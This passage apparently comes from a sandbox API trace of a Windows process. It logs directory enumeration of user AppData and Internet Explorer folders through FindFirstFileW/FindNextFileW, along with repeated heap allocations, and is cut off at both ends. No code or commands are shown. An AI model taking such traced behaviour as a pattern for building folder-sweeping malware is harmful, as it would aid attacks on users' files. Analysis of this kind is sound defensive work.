ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0194.460] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.460] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0194.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0194.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0194.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0194.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0194.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0194.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0194.461] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0194.461] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.461] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.461] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0194.461] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0194.461] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0194.461] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0194.461] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.461] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.462] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.462] PathFindFileNameW (pszPath="") returned="" [0194.462] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0194.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0194.464] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.464] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0194.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0194.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6d8b40 [0194.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9c38 [0194.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0194.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2c16398 [0194.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0194.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7599e8 | out: hHeap=0x6a0000) returned 1 [0194.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0194.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x7599e8 [0194.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8b40 | out: hHeap=0x6a0000) returned 1 [0194.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0194.465] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0194.465] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0194.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0194.466] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0194.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0194.466] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0194.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.496] RtlAllocateHeap 